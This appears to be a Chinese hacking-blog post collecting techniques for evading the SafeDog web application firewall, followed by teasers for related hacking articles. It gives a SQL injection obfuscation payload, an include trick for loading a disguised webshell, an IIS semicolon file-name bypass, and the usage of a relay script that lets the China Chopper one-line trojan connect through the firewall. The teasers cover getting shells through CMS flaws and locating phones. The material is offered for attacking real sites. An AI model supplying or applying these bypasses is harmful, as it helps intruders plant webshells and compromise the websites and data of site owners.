过安全狗技术总汇全集!!

hacker5年前黑客文章695
1.过注入
2.过大马被阻拦访问
3.过菜刀连接一句话被拦截
4.过1.asp;.jpg这样的文件
其他我没遇到了。。
现在一点一点讲:
1.过注入
*** 一:a.asp?aaa=%00&id=sql语句
*** 二: a.asp?id=sql语句   里面把安全过滤的加个%l 比如: un%aion sel%aect 1,2,3,4 fr%aom admin
2.过大马被阻拦访问
*** 一:上传一个大马 然后访问http://sss.com/dama.asp  访问后出现拦截。
那么解决 *** 先将dama.asp改名dama.jpg上传,然后在同目录上传个文件da.asp 内容为: <!–#include file=”dama.jpg” –>  这样再访问da.asp  就不会被拦截了。
3.过菜刀连接一句话被拦截
*** 一:不用菜刀连接一句话,用别的一句话连接端。
*** 二:中转下连接菜刀,把过滤掉的词替换掉。
4.过1.asp;.jpg这样的文件拦截
*** 一:;1.asp;.jpg
*** 二:保密
具体就为大家总结这么多了,安全狗 反正基本可以无视了!!
大家还有什么要补充的可以发在下面!
下面这个脚本是过安全狗连接菜刀用的 用法: 先把这个脚本放到个可执行.asp的目录
然后访问http://www.xx.com/asf.asp?dz=你要过的那个webshell地址
然后把地址输入进菜刀 密码还是你要过的那个webshell的密码 类型也是选择那个一句话木马的后缀类型
例如:http://www.xx.com/asf.asp?dz=http://xxx.com/yijuhua.php 密码
这样输入就菜刀

这个脚本暂时支持.php .aspx的一句话连接  .asp的可能还不行 没测试过。如果谁有装了安全狗的webshell可以告诉我下。我再测试下把这个脚本修改全面都支持!

标签: 黑客技术

相关文章

Nexpose免费下载

Nexpose免费下载

近期在科学研究Metasploit,发觉Metasploit集成化了Nexpose,因为在网上各种各样材料很乱,我是搜索了很长期才历经分类整理共享给大伙儿;   Rapid7 Nexpos...

黑客定位手机位置,别小瞧这些小细节

黑客便是假借黑客名义操控别人电脑的黑客技能,咱们都知道手机有定位功能,但咱们并不知道如何定位手机号码,那么今日黑客教你定位手机号码以及手机号码定位软件下载。 只是经过一个手机号,就能够精确认位出你的...

专用工具完全免费使用方法

专用工具完全免费使用方法

什么叫Ntop? Ntop是互联网检测专用工具,由网络信息安全技术专业工作人员用于显示信息互联网应用状况。当放置“互动方式”时,ntop将在终端用户的终端设备上显示信息网络状态。假如置放在“Web方...

Nessus 5.0 使用指南

参考官方手册 http://static.tenable.com/documentation/nessus_5.0_user_guide.pdf Nessus是世界上最流行的...

iis7.5加fck解析漏洞后台拿shell

IIS6.0解析漏洞,可以上传a.asp;.jps或者a.asp;a.jpg或者a.asp目录下传任意格式小马,都会解析 这次讲的是IIS7.5解析漏洞, http://www.xxo...

科讯kesioncms 5.5以下漏洞后台拿shell

科讯kesioncms 5.5以下漏洞后台拿shell

科讯做为一个强大的cms程序大多被政府和教育机构网站所使用,关于科讯的漏洞利用教程网上不是很多。由于科讯的后台登陆需要输入认证码,而认证码没有保存在数据库而是保存在asp文件中,所以在某种程度上增...